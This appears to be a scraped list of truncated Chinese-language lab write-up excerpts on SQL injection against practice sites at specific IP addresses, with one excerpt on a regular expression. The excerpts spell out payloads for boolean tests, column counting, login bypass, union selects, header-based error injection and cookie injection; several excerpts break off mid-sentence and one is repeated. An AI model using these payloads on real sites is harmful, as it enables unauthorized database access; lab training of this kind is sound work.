第一题首先登陆网站http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/然后测试and1=1，and1=2，发现存在注入点然后尝试http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1%27%20order%20by%204--+发现字段数为3位但是使用http://1

第一题首先登陆网站http://120.203.13.75:8150/New/PostBased/RankOne/sql-one/在输入框内输入'返回错误说明存在注入点，首先万能密码试一下'or 1=1#登陆成功，存在POST注入'or 1=1 order by 3#查看字段数为2'or 1=2 union select 1,2#页面返回1，2'or 1=2

第一题首先登陆网站http://120.203.13.75:8150/New/HeaderBased/RankOne/sql-one/打开hackbar，先获取URL，然后将Post data,Referrer,User Agent,Cookies全部勾选上然后在下方依次试当User加'后页面回显错误，说明存在注入我们无法直接order by，所以尝试语句1' or updatex

第一题首先?id=1显示网页，发现'1'，所以首先要闭合引号http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=1' and 1=1发现，前面闭合了，后面没有闭合，所以使用--+来闭合后面的引号然后开始注入and 1=2测试注入点页面报错，发现注入点，猜字段数http://120.203.13.

打开题目发现有几行代码正则匹配逐个分析//为正则匹配，先排除i然后是意思是zkaq并且可以匹配后面任意字符，我们这么用zkaq!!!!来区分然后是这段，意思是key后面任意字符的位数要在2-9之间，我们这里用key!!!来区分：照打\的意思是转义字符所以这里的\/就是/中间还有.*与上面一样我们打！！！来区分，这里是/!!!!/()是为了标记表达式，这里可以忽略*的意思是前面的一个字符可以有多个，

首先：and 1=1 and 1=2因为and 判断前后，如果全是真返回真，如果其中一个假，返回假所以，and 1=1 返回页面正常， and 1=2 恒为假，返回页面出错然后发现注入点：117.41.229.122:8003/?id=1 and 1=1 order by 2当尝试到有两个字段数为正常三个字段报错时，说

首先试一下and 1=1发现网站设置了防注入，意味着不能用get的方式进行注入了输入javascript:alert(document.cookie="id="+escape("101"));发现可以cookie注入接下来查询字段数http://120.203.13.75:8001/ProductShow.asp?ID=105 order

首先试一下and 1=1发现网站设置了防注入，意味着不能用get的方式进行注入了我们尝试使用cookie注入javascript:alert(document.cookie='id='+escape('176 and 1=1'));回显一个弹窗这句语句的意思是使用js方式，借用alert弹框函数执行一段js代码，这段代码的作用是在coo

首先：and 1=1 and 1=2因为and 判断前后，如果全是真返回真，如果其中一个假，返回假所以，and 1=1 返回页面正常， and 1=2 恒为假，返回页面出错然后发现注入点：117.41.229.122:8003/?id=1 and 1=1 order by 2当尝试到有两个字段数为正常三个字段报错时，说